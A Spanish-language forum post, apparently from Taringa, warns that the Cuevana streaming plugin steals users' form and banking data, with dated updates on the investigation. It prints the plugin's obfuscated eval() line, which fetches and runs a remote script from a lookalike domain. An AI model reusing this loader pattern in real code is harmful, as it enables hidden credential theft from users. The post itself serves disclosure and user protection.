¿El plug-in de #Cuevana roba información financiera?
Un pais con buena gente. Los posts sobre este tema no estan saliendo en la home de taringa. Eterna casualidad.
Actualización: es probable que el script del plugin haya sido modificado por un tercero, ajeno a Cuevana. Lee el post hasta el final.
Cuevana, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de "phising" (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene código malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.
Al parecer, al intentar visionar contenido de su sitio, este pide autorización para instalar un complemento (plugin) para tu navegador (tanto Firefox como Chrome). Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web hxxp://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.
Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin "Cuevana Streaming". Después de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.
Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip, etc.), despues abre el archivo "script-compiler.js" que encontrarás en la carpeta "content". Una vez abierto ese archivo observa la linea número 232.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('6 0=7 5();0.4('1','2://3.8/h.9?'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))
Actualización 19:00: confirmado, en Firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.
Actualización 19.30: descomprimir el XPI con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO LO INSTALE).
Entrar en la carpeta "content" y mirar la linea 232 del archivo "script-compiler.js". La url maliciosa es hxxp://cuevanatv.asia/back3.js.
Actualización 19.50: han cambiado al código fuente del plugin. El plugin original para analizarlo se encuentra aquí.
Actualización 19.57: el nuevo plugin (diferente pero con la misma versión para que no se sospeche ) ya no roba datos. En el Tamper Data ya no da el aviso que daba antes. Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de Foro Coches se puede encontrar el fichero original con el código malicioso, como prueba. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.
Actualización 21:00: he analizado el código fuente de la versión 4.2 instalado en mi propia computadora hace tiempo (más de un mes) y la misma versión 4.2 modificada y efectivamente se observa la diferencia en el código fuente. A continuación dejo los dos fuentes:
Versión instalada hace un mes
Versión modificada
En Windows Vista o superior, el plugin lo puedes encontrar en: C:Users\AppDataRoamingMozillaFirefoxProfiles\
La diferencia en el código podría indicar que:
Cuevana efectivamente robaba información del usuario
Alguien ingresó al servidor de Cuevana y modificó el código fuente del plugin para realizar esta acción. No sería la primera vez ni la primera vulnerabilidad en el sitio.
El tiempo dirá.
Actualización 21:50: Cuevana está investigando el tema y recomienda desinstalar el plugin, e instalarlo nuevamente. Además se deben cambiar todas las contraseñas.